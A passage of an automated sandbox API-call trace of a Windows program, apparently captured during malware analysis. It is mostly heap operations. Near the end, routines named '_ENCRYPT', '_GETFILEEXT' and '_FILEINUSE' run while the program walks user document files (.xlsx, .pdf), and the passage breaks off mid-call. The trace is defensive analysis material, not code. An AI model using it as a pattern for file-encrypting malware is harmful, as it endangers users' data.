RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xd0) returned 0x791190 [0035.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0035.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0035.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0035.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0035.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0035.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0035.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0035.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0035.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0035.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0035.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0035.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0035.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0035.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0035.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0035.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0035.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0035.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0035.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0035.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0035.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0035.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0035.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0035.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0035.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0035.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0035.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0035.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0035.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0035.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0035.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0035.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0035.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0035.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0035.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0035.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0035.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0035.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0035.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0035.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0035.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0035.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0035.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0035.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0035.128] FreeLibrary (hLibModule=0x76e10000) returned 1 [0035.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0035.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0035.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0035.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0035.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0035.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0035.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0035.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0035.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0035.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0035.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0035.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0035.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0035.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0035.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0035.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0035.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0035.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0035.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0035.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0035.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0035.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0035.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0035.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0035.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0035.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0035.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0035.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0035.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0035.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0035.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0035.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0035.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0035.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0035.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0035.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0035.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0035.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0035.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0035.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0035.130] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0035.130] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0035.130] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0035.130] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0035.130] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0035.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0035.130] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0035.130] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0035.130] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0035.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0035.130] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0035.130] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0035.130] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0035.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0035.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0035.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0035.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0035.130] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0035.130] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0035.130] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0035.130] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0035.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0035.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0035.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0035.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0035.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0035.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0035.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0035.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0035.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0035.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0035.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0035.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0035.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0035.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0035.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0035.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0035.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0035.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0035.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0035.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0035.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0035.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0035.131] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0035.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0035.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0035.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0035.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0035.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0035.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0035.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0035.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0035.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0035.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0035.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0035.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0035.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0035.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0035.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0035.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0035.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0035.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0035.132] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0035.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0035.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0035.132] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0035.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8895c8 [0035.132] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x8895c8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0035.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0035.132] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0035.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0035.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0035.133] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0035.133] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0035.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0035.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0035.133] CloseHandle (hObject=0x128) returned 1 [0035.133] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0035.133] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0035.133] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0035.133] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0035.133] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0035.133] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0035.133] FreeLibrary (hLibModule=0x76e10000) returned 1 [0035.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0035.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0035.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0035.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0035.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0035.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0035.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0035.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0035.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0035.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0035.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0035.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0035.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0035.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0035.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0035.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0035.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0035.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0035.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0035.134] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0035.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0035.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0035.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0035.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0035.134] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0035.134] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0035.134] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.134] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0035.134] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0035.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lsx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xlsx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xlsx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0035.135] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.135] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.135] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.135] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\sheho1.xlsx", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60851e90, ftCreationTime.dwHighDateTime=0x1d5b87c, ftLastAccessTime.dwLowDateTime=0x71cbc50, ftLastAccessTime.dwHighDateTime=0x1d5b8db, ftLastWriteTime.dwLowDateTime=0x71cbc50, ftLastWriteTime.dwHighDateTime=0x1d5b8db, nFileSizeHigh=0x0, nFileSizeLow=0x811, dwReserved0=0x0, dwReserved1=0x777648, cFileName="sheho1.xlsx", cAlternateFileName="SHEHO1~1.XLS")) returned 0x7c20c0 [0035.135] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0035.135] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.135] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\sheho1.xlsx", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60851e90, ftCreationTime.dwHighDateTime=0x1d5b87c, ftLastAccessTime.dwLowDateTime=0x71cbc50, ftLastAccessTime.dwHighDateTime=0x1d5b8db, ftLastWriteTime.dwLowDateTime=0x71cbc50, ftLastWriteTime.dwHighDateTime=0x1d5b8db, nFileSizeHigh=0x0, nFileSizeLow=0x811, dwReserved0=0x0, dwReserved1=0x777648, cFileName="sheho1.xlsx", cAlternateFileName="SHEHO1~1.XLS")) returned 0x7c20c0 [0035.135] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0035.135] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.135] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.135] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.135] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0035.136] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0035.136] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0035.136] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0035.136] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0035.136] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0035.136] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0035.136] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\s_uc9.pdf"), 